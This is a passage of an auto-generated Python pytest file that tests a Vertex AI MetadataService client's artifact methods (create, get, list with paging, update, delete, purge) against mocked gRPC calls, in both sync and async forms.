mock_val = "artifact_id_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_create_artifact_flattened_error_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.create_artifact(
metadata_service.CreateArtifactRequest(),
parent="parent_value",
artifact=gca_artifact.Artifact(name="name_value"),
artifact_id="artifact_id_value",
)
@pytest.mark.parametrize(
"request_type",
[
metadata_service.GetArtifactRequest,
dict,
],
)
def test_get_artifact(request_type, transport: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_artifact), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = artifact.Artifact(
name="name_value",
display_name="display_name_value",
uri="uri_value",
etag="etag_value",
state=artifact.Artifact.State.PENDING,
schema_title="schema_title_value",
schema_version="schema_version_value",
description="description_value",
)
response = client.get_artifact(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.GetArtifactRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, artifact.Artifact)
assert response.name == "name_value"
assert response.display_name == "display_name_value"
assert response.uri == "uri_value"
assert response.etag == "etag_value"
assert response.state == artifact.Artifact.State.PENDING
assert response.schema_title == "schema_title_value"
assert response.schema_version == "schema_version_value"
assert response.description == "description_value"
def test_get_artifact_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_artifact), "__call__") as call:
client.get_artifact()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.GetArtifactRequest()
@pytest.mark.asyncio
async def test_get_artifact_async(
transport: str = "grpc_asyncio", request_type=metadata_service.GetArtifactRequest
):
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_artifact), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
artifact.Artifact(
name="name_value",
display_name="display_name_value",
uri="uri_value",
etag="etag_value",
state=artifact.Artifact.State.PENDING,
schema_title="schema_title_value",
schema_version="schema_version_value",
description="description_value",
)
)
response = await client.get_artifact(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.GetArtifactRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, artifact.Artifact)
assert response.name == "name_value"
assert response.display_name == "display_name_value"
assert response.uri == "uri_value"
assert response.etag == "etag_value"
assert response.state == artifact.Artifact.State.PENDING
assert response.schema_title == "schema_title_value"
assert response.schema_version == "schema_version_value"
assert response.description == "description_value"
@pytest.mark.asyncio
async def test_get_artifact_async_from_dict():
await test_get_artifact_async(request_type=dict)
def test_get_artifact_field_headers():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.GetArtifactRequest()
request.name = "name_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_artifact), "__call__") as call:
call.return_value = artifact.Artifact()
client.get_artifact(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"name=name_value",
) in kw["metadata"]
@pytest.mark.asyncio
async def test_get_artifact_field_headers_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.GetArtifactRequest()
request.name = "name_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_artifact), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(artifact.Artifact())
await client.get_artifact(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"name=name_value",
) in kw["metadata"]
def test_get_artifact_flattened():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_artifact), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = artifact.Artifact()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.get_artifact(
name="name_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
def test_get_artifact_flattened_error():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.get_artifact(
metadata_service.GetArtifactRequest(),
name="name_value",
)
@pytest.mark.asyncio
async def test_get_artifact_flattened_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.get_artifact), "__call__") as call:
# Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(artifact.Artifact())
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.get_artifact(
name="name_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_get_artifact_flattened_error_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.get_artifact(
metadata_service.GetArtifactRequest(),
name="name_value",
)
@pytest.mark.parametrize(
"request_type",
[
metadata_service.ListArtifactsRequest,
dict,
],
)
def test_list_artifacts(request_type, transport: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_artifacts), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = metadata_service.ListArtifactsResponse(
next_page_token="next_page_token_value",
)
response = client.list_artifacts(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.ListArtifactsRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, pagers.ListArtifactsPager)
assert response.next_page_token == "next_page_token_value"
def test_list_artifacts_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_artifacts), "__call__") as call:
client.list_artifacts()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.ListArtifactsRequest()
@pytest.mark.asyncio
async def test_list_artifacts_async(
transport: str = "grpc_asyncio", request_type=metadata_service.ListArtifactsRequest
):
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_artifacts), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
metadata_service.ListArtifactsResponse(
next_page_token="next_page_token_value",
)
)
response = await client.list_artifacts(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.ListArtifactsRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, pagers.ListArtifactsAsyncPager)
assert response.next_page_token == "next_page_token_value"
@pytest.mark.asyncio
async def test_list_artifacts_async_from_dict():
await test_list_artifacts_async(request_type=dict)
def test_list_artifacts_field_headers():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.ListArtifactsRequest()
request.parent = "parent_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_artifacts), "__call__") as call:
call.return_value = metadata_service.ListArtifactsResponse()
client.list_artifacts(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"parent=parent_value",
) in kw["metadata"]
@pytest.mark.asyncio
async def test_list_artifacts_field_headers_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.ListArtifactsRequest()
request.parent = "parent_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_artifacts), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
metadata_service.ListArtifactsResponse()
)
await client.list_artifacts(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"parent=parent_value",
) in kw["metadata"]
def test_list_artifacts_flattened():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_artifacts), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = metadata_service.ListArtifactsResponse()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.list_artifacts(
parent="parent_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].parent
mock_val = "parent_value"
assert arg == mock_val
def test_list_artifacts_flattened_error():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.list_artifacts(
metadata_service.ListArtifactsRequest(),
parent="parent_value",
)
@pytest.mark.asyncio
async def test_list_artifacts_flattened_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_artifacts), "__call__") as call:
# Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            metadata_service.ListArtifactsResponse()
        )
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.list_artifacts(
parent="parent_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].parent
mock_val = "parent_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_list_artifacts_flattened_error_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.list_artifacts(
metadata_service.ListArtifactsRequest(),
parent="parent_value",
)
def test_list_artifacts_pager(transport_name: str = "grpc"):
client = MetadataServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
transport=transport_name,
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_artifacts), "__call__") as call:
# Set the response to a series of pages.
call.side_effect = (
metadata_service.ListArtifactsResponse(
artifacts=[
artifact.Artifact(),
artifact.Artifact(),
artifact.Artifact(),
],
next_page_token="abc",
),
metadata_service.ListArtifactsResponse(
artifacts=[],
next_page_token="def",
),
metadata_service.ListArtifactsResponse(
artifacts=[
artifact.Artifact(),
],
next_page_token="ghi",
),
metadata_service.ListArtifactsResponse(
artifacts=[
artifact.Artifact(),
artifact.Artifact(),
],
),
RuntimeError,
)
        # The pager should carry the routing metadata derived from the request.
        metadata = (
            gapic_v1.routing_header.to_grpc_metadata((("parent", ""),)),
        )
pager = client.list_artifacts(request={})
assert pager._metadata == metadata
results = list(pager)
assert len(results) == 6
assert all(isinstance(i, artifact.Artifact) for i in results)
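# Illustrative helper (our addition, not used by the generated tests): the
# pager can also be consumed page by page; each page exposes the raw response
# via .raw_page, whose next_page_token the *_pages tests below assert on.
def _example_collect_page_tokens(pager):
    return [page.raw_page.next_page_token for page in pager.pages]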
def test_list_artifacts_pages(transport_name: str = "grpc"):
client = MetadataServiceClient(
        credentials=ga_credentials.AnonymousCredentials(),
transport=transport_name,
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.list_artifacts), "__call__") as call:
# Set the response to a series of pages.
call.side_effect = (
metadata_service.ListArtifactsResponse(
artifacts=[
artifact.Artifact(),
artifact.Artifact(),
artifact.Artifact(),
],
next_page_token="abc",
),
metadata_service.ListArtifactsResponse(
artifacts=[],
next_page_token="def",
),
metadata_service.ListArtifactsResponse(
artifacts=[
artifact.Artifact(),
],
next_page_token="ghi",
),
metadata_service.ListArtifactsResponse(
artifacts=[
artifact.Artifact(),
artifact.Artifact(),
],
),
RuntimeError,
)
pages = list(client.list_artifacts(request={}).pages)
for page_, token in zip(pages, ["abc", "def", "ghi", ""]):
assert page_.raw_page.next_page_token == token
@pytest.mark.asyncio
async def test_list_artifacts_async_pager():
client = MetadataServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_artifacts), "__call__", new_callable=mock.AsyncMock
) as call:
# Set the response to a series of pages.
call.side_effect = (
metadata_service.ListArtifactsResponse(
artifacts=[
artifact.Artifact(),
artifact.Artifact(),
artifact.Artifact(),
],
next_page_token="abc",
),
metadata_service.ListArtifactsResponse(
artifacts=[],
next_page_token="def",
),
metadata_service.ListArtifactsResponse(
artifacts=[
artifact.Artifact(),
],
next_page_token="ghi",
),
metadata_service.ListArtifactsResponse(
artifacts=[
artifact.Artifact(),
artifact.Artifact(),
],
),
RuntimeError,
)
async_pager = await client.list_artifacts(
request={},
)
assert async_pager.next_page_token == "abc"
responses = []
async for response in async_pager: # pragma: no branch
responses.append(response)
assert len(responses) == 6
assert all(isinstance(i, artifact.Artifact) for i in responses)
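# Note the asymmetry with the sync pager above: the async surface returns a
# coroutine, so the pager itself must first be awaited; items are then drawn
# with ``async for``, which fetches follow-up pages lazily. A sketch:
#
#     async_pager = await client.list_artifacts(request={})
#     async for item in async_pager:
#         ...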
@pytest.mark.asyncio
async def test_list_artifacts_async_pages():
client = MetadataServiceAsyncClient(
        credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_artifacts), "__call__", new_callable=mock.AsyncMock
) as call:
# Set the response to a series of pages.
call.side_effect = (
metadata_service.ListArtifactsResponse(
artifacts=[
artifact.Artifact(),
artifact.Artifact(),
artifact.Artifact(),
],
next_page_token="abc",
),
metadata_service.ListArtifactsResponse(
artifacts=[],
next_page_token="def",
),
metadata_service.ListArtifactsResponse(
artifacts=[
artifact.Artifact(),
],
next_page_token="ghi",
),
metadata_service.ListArtifactsResponse(
artifacts=[
artifact.Artifact(),
artifact.Artifact(),
],
),
RuntimeError,
)
pages = []
async for page_ in (
await client.list_artifacts(request={})
).pages: # pragma: no branch
pages.append(page_)
for page_, token in zip(pages, ["abc", "def", "ghi", ""]):
assert page_.raw_page.next_page_token == token
@pytest.mark.parametrize(
"request_type",
[
metadata_service.UpdateArtifactRequest,
dict,
],
)
def test_update_artifact(request_type, transport: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.update_artifact), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = gca_artifact.Artifact(
name="name_value",
display_name="display_name_value",
uri="uri_value",
etag="etag_value",
state=gca_artifact.Artifact.State.PENDING,
schema_title="schema_title_value",
schema_version="schema_version_value",
description="description_value",
)
response = client.update_artifact(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.UpdateArtifactRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, gca_artifact.Artifact)
assert response.name == "name_value"
assert response.display_name == "display_name_value"
assert response.uri == "uri_value"
assert response.etag == "etag_value"
assert response.state == gca_artifact.Artifact.State.PENDING
assert response.schema_title == "schema_title_value"
assert response.schema_version == "schema_version_value"
assert response.description == "description_value"
def test_update_artifact_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.update_artifact), "__call__") as call:
client.update_artifact()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.UpdateArtifactRequest()
@pytest.mark.asyncio
async def test_update_artifact_async(
transport: str = "grpc_asyncio", request_type=metadata_service.UpdateArtifactRequest
):
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.update_artifact), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
gca_artifact.Artifact(
name="name_value",
display_name="display_name_value",
uri="uri_value",
etag="etag_value",
state=gca_artifact.Artifact.State.PENDING,
schema_title="schema_title_value",
schema_version="schema_version_value",
description="description_value",
)
)
response = await client.update_artifact(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.UpdateArtifactRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, gca_artifact.Artifact)
assert response.name == "name_value"
assert response.display_name == "display_name_value"
assert response.uri == "uri_value"
assert response.etag == "etag_value"
assert response.state == gca_artifact.Artifact.State.PENDING
assert response.schema_title == "schema_title_value"
assert response.schema_version == "schema_version_value"
assert response.description == "description_value"
@pytest.mark.asyncio
async def test_update_artifact_async_from_dict():
await test_update_artifact_async(request_type=dict)
def test_update_artifact_field_headers():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.UpdateArtifactRequest()
request.artifact.name = "name_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.update_artifact), "__call__") as call:
call.return_value = gca_artifact.Artifact()
client.update_artifact(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"artifact.name=name_value",
) in kw["metadata"]
@pytest.mark.asyncio
async def test_update_artifact_field_headers_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.UpdateArtifactRequest()
request.artifact.name = "name_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.update_artifact), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
gca_artifact.Artifact()
)
await client.update_artifact(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"artifact.name=name_value",
) in kw["metadata"]
def test_update_artifact_flattened():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.update_artifact), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = gca_artifact.Artifact()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.update_artifact(
artifact=gca_artifact.Artifact(name="name_value"),
update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]),
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].artifact
mock_val = gca_artifact.Artifact(name="name_value")
assert arg == mock_val
arg = args[0].update_mask
mock_val = field_mask_pb2.FieldMask(paths=["paths_value"])
assert arg == mock_val
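# A hedged usage sketch for the update_mask above ("description" is an
# illustrative field path; the test uses the placeholder "paths_value"): a
# real update names concrete Artifact fields so only those fields change.
#
#     client.update_artifact(
#         artifact=gca_artifact.Artifact(name="...", description="new text"),
#         update_mask=field_mask_pb2.FieldMask(paths=["description"]),
#     )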
def test_update_artifact_flattened_error():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.update_artifact(
metadata_service.UpdateArtifactRequest(),
artifact=gca_artifact.Artifact(name="name_value"),
update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]),
)
@pytest.mark.asyncio
async def test_update_artifact_flattened_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.update_artifact), "__call__") as call:
# Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            gca_artifact.Artifact()
        )
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.update_artifact(
artifact=gca_artifact.Artifact(name="name_value"),
update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]),
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].artifact
mock_val = gca_artifact.Artifact(name="name_value")
assert arg == mock_val
arg = args[0].update_mask
mock_val = field_mask_pb2.FieldMask(paths=["paths_value"])
assert arg == mock_val
@pytest.mark.asyncio
async def test_update_artifact_flattened_error_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.update_artifact(
metadata_service.UpdateArtifactRequest(),
artifact=gca_artifact.Artifact(name="name_value"),
update_mask=field_mask_pb2.FieldMask(paths=["paths_value"]),
)
@pytest.mark.parametrize(
"request_type",
[
metadata_service.DeleteArtifactRequest,
dict,
],
)
def test_delete_artifact(request_type, transport: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_artifact), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name="operations/spam")
response = client.delete_artifact(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.DeleteArtifactRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, future.Future)
def test_delete_artifact_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_artifact), "__call__") as call:
client.delete_artifact()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.DeleteArtifactRequest()
@pytest.mark.asyncio
async def test_delete_artifact_async(
transport: str = "grpc_asyncio", request_type=metadata_service.DeleteArtifactRequest
):
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_artifact), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name="operations/spam")
)
response = await client.delete_artifact(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.DeleteArtifactRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, future.Future)
@pytest.mark.asyncio
async def test_delete_artifact_async_from_dict():
await test_delete_artifact_async(request_type=dict)
def test_delete_artifact_field_headers():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.DeleteArtifactRequest()
request.name = "name_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_artifact), "__call__") as call:
call.return_value = operations_pb2.Operation(name="operations/op")
client.delete_artifact(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"name=name_value",
) in kw["metadata"]
@pytest.mark.asyncio
async def test_delete_artifact_field_headers_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.DeleteArtifactRequest()
request.name = "name_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_artifact), "__call__") as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
operations_pb2.Operation(name="operations/op")
)
await client.delete_artifact(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"name=name_value",
) in kw["metadata"]
def test_delete_artifact_flattened():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_artifact), "__call__") as call:
# Designate an appropriate return value for the call.
call.return_value = operations_pb2.Operation(name="operations/op")
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.delete_artifact(
name="name_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
def test_delete_artifact_flattened_error():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.delete_artifact(
metadata_service.DeleteArtifactRequest(),
name="name_value",
)
@pytest.mark.asyncio
async def test_delete_artifact_flattened_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.delete_artifact), "__call__") as call:
# Designate an appropriate return value for the call.
        call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
            operations_pb2.Operation(name="operations/spam")
        )
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.delete_artifact(
name="name_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_delete_artifact_flattened_error_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.delete_artifact(
metadata_service.DeleteArtifactRequest(),
name="name_value",
)
@pytest.mark.parametrize(
"request_type",
[
metadata_service.PurgeArtifactsRequest,
dict,
],
)
def test_purge_artifacts(request_type, transport: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(type(client.transport.purge_artifacts), "__call__") as call:
# Designate an appropriate return value for the call.
